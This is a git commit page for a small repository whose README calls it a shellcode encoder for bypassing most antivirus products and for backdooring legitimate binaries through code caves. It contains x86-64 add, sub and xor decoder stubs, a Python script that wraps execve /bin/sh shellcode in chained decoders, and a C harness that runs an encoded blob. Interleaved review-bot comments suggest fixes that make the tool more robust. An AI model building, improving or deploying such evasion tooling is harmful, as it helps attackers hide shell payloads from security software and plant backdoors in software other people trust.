
first commit

master
sp0re 1 year ago
commit
1c7cca736c
11 changed files with 147 additions and 0 deletions
  1. +7
    -0
      README.md
  2. +17
    -0
      add_decoder.s
  3. +58
    -0
      sc_encode.py
  4. BIN
      sub_decoder
  5. +17
    -0
      sub_decoder.s
  6. BIN
      test_sc
  7. +15
    -0
      test_sc.c
  8. BIN
      write
  9. +16
    -0
      write.s
  10. BIN
      xor_decoder
  11. +17
    -0
      xor_decoder.s

+ 7
- 0
README.md View File

@@ -0,0 +1,7 @@
# Shellcode encode

wip...

Very simple encoding but enough to bypass a mast majority of AVs out there.. Perfect for backdooring legit bins using codecaves for example

You can create your won encoding logic by first creating the decoder in asm, then doing the same logic to apply on the shellcode in python. You can also add multiple layer of encoding for no reason..

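--- a/add_decoder.s
+++ b/add_decoder.s
@@ -0,0 +1,17 @@
+jmp short three
+
+one:
+pop rsi
+xor rcx, rcx
+mov cl, 20
+
+two:
+sub byte [rsi + rcx -1], 1
+sub cl, 1
+jnz two
+jmp short four
+
+three:
+call one
+
+four: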
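Review bot: The decoder has no header comment, and the immediates on `mov cl, 20` and `sub byte [rsi + rcx -1], 1` are placeholders that sc_encode.py's ADD_DECODER template overwrites (`%SC_LEN%` for the count byte, `%VAL%` for the operand byte), so a reader of the .s file alone cannot tell those constants carry no meaning; I would add a header such as `; NASM, x86-64. rsi = start of the bytes that follow 'four' (address obtained via the call/pop pair), cl = byte count (max 255). The 20 and 1 below are patched by sc_encode.py; this stub undoes the 'add' encoding, hence the sub.` Renaming `one`/`two`/`three`/`four` to names that say what they are (decode entry, loop, address fetch, payload) would also help, since the numbered labels say nothing about control flow. The file has no `BITS 64` directive, unlike write.s, so whether `pop rsi` assembles in 64-bit mode depends on the output format given to nasm; stating it explicitly avoids a silent mode mismatch. sub_decoder.s and xor_decoder.s have exactly the same gaps.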

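--- a/sc_encode.py
+++ b/sc_encode.py
@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+
+import sys
+from binascii import hexlify
+
+
+# execve /bin/sh
+SC = b"\x50\x48\x31\xd2\x48\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\xb0\x3b\x0f\x05"
+
+ADD_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x6c\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
+SUB_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x44\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
+XOR_DECODER = b"\xeb\x12\x5e\x48\x31\xc9\xb1%SC_LEN%\x80\x74\x0e\xff%VAL%\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff"
+
+
+def encode(sc, action, value):
+new_sc = []
+if action == 'add':
+decoder = ADD_DECODER
+elif action == 'sub':
+decoder = SUB_DECODER
+elif action == 'xor':
+decoder = XOR_DECODER
+
+for byte in sc:
+if action == 'add':
+new_sc += [(byte+value) % 256]
+elif action == 'sub':
+new_sc += [(byte-value) % 256]
+elif action == 'xor':
+new_sc += [(byte^value) % 256]
+
+new_sc = bytes(new_sc)
+decoder = decoder.replace(b"%SC_LEN%", bytes([len(new_sc)]))
+decoder = decoder.replace(b"%VAL%", bytes([value]))
+return decoder + new_sc
+
+
+def main():
+rnd = []
+for i in range(0, len(sys.argv[1:]), 2):
+rnd += [(sys.argv[i+1], int(sys.argv[i+2]))]
+
+print(f"[*] Raw shellcode length: {len(SC)}")
+
+encoded = SC
+for i in rnd:
+encoded = encode(encoded, i[0], i[1])
+
+if b'\x00' in encoded:
+print("[!] Warning: null byte found in encoded shellcode!")
+
+print(f"[*] Final encoded shellcode + decoder length: {len(encoded)}")
+print("[+] Shellcode: ")
+print( "\\x" + str(b"\\x".join(hexlify(bytes([x])) for x in encoded), 'utf-8') )
+
+
+if __name__=='__main__':
+main()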
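Review bot: `encode` leaves `decoder` unassigned when `action` is anything other than add/sub/xor, so a mistyped action on the command line fails later at `decoder.replace(...)` with a NameError instead of a clear message; add `else: raise ValueError(f"unknown action: {action!r}")` after the `elif action == 'xor':` branch (the per-byte loop silently produces an empty payload for the same reason). `bytes([value])` and `bytes([len(new_sc)])` raise a bare ValueError when `value` is outside 0..255 or the payload exceeds 255 bytes — the latter is a genuine limit because each decoder stub counts in `cl` — so both deserve explicit checks whose message says which limit was hit, and that limit belongs in the function's docstring. `main` pairs `sys.argv` assuming an even number of arguments; an odd count raises IndexError at `sys.argv[i+2]`. The `% 256` on the xor branch is a no-op for single bytes and can go.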

BIN
sub_decoder View File


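--- a/sub_decoder.s
+++ b/sub_decoder.s
@@ -0,0 +1,17 @@
+jmp short three
+
+one:
+pop rsi
+xor rcx, rcx
+mov cl, 20
+
+two:
+add byte [rsi + rcx -1], 1
+sub cl, 1
+jnz two
+jmp short four
+
+three:
+call one
+
+four: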

BIN
test_sc View File


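--- a/test_sc.c
+++ b/test_sc.c
@@ -0,0 +1,15 @@
+#include <stdio.h>
+#include <string.h>
+
+// Generated with 'python sc_encode.py add 4 sub 6 xor 7'
+char code[] =
+"\xeb\x12\x5e\x48\x31\xc9\xb1\x63\x80\x44\x0e\xff\x28\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xe9\xff\xff\xff\xc3\xea\x36\x20\x09\xa1\x89\x22\x58\x4c\xe6\xd7\xdd\x58\xc1\xd9\x4d\xce\xc3\xdd\xc0\xc1\xd7\xd7\xd7\xc6\xef\x33\x25\x0c\xa4\x8c\x0c\x5d\x41\xe3\xd2\xd9\x5d\xc4\xdc\x48\xcb\xc6\xd8\xc5\xc4\xd2\xd2\xd2\xc2\xeb\x3f\x21\x08\xa0\x88\xf1\x59\x4d\xef\xde\xdb\x59\xc0\xd8\x54\xd7\xc2\xe4\xc1\xc0\xde\xde\xde\x2b\x23\x0a\xb5\x23\x0a\xd1\x23\x9c\x08\x45\x42\x49\x08\x08\x54\x43\x34\x37\x38\x8b\x1c\xe8\xe6";
+
+
+int main(int argc, char** argv)
+{
+printf("Shellcode length: %d bytes\n", (int)strlen(code));
+
+(*(void(*)()) code)();
+return 0;
+}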
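Review bot: The comment `// Generated with 'python sc_encode.py add 4 sub 6 xor 7'` does not appear to match the array below it: the literal is 124 bytes, which is the 24-byte `SC` payload wrapped in four 25-byte decoder stubs, whereas three operations would give 99 bytes, and the outermost stub's opcode bytes (`80 44`, an `add`) with immediate 0x28 are not the xor-by-7 stub the listed arguments would produce last. Since this comment is the only record of how to reproduce the blob, either regenerate the array or correct the comment to the command actually used. `strlen(code)` stops at the first NUL, which is the reason the encoder prints its null-byte warning; a one-line comment tying the two together would help the next reader. The indirect call `(*(void(*)()) code)();` runs bytes out of the writable `code[]` array, which only works when the data segment is mapped executable — the file should state that it is a lab-only harness that will fault under a default non-executable data mapping.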

BIN
write View File


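--- a/write.s
+++ b/write.s
@@ -0,0 +1,16 @@
+BITS 64
+
+section .text
+global _start
+
+_start:
+xor rax, rax
+push rax
+inc rax
+mov rdi, rax
+push 0x41414141
+mov rsi, rsp
+mov rdx, 0x8
+syscall
+mov rax, 60
+syscall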
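Review bot: `mov rdx, 0x8` asks write(2) for eight bytes, but `push 0x41414141` places a sign-extended 32-bit immediate in an 8-byte slot, so the call emits `AAAA` followed by four NUL bytes; `mov edx, 4` matches what was actually pushed. The exit path reuses `rdi`, which still holds the stdout descriptor from `mov rdi, rax`, so the process exits with status 1 rather than 0 — `xor edi, edi` before the second `syscall` makes the success status explicit. A short header stating that this is a Linux x86-64 write/exit smoke test, and that `rax = 1` (SYS_write) comes from the `inc rax` after `xor rax, rax`, would make the register juggling readable without stepping through it.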

BIN
xor_decoder View File


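--- a/xor_decoder.s
+++ b/xor_decoder.s
@@ -0,0 +1,17 @@
+jmp short three
+
+one:
+pop rsi
+xor rcx, rcx
+mov cl, 20
+
+two:
+xor byte [rsi + rcx -1], 1
+sub cl, 1
+jnz two
+jmp short four
+
+three:
+call one
+
+four: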
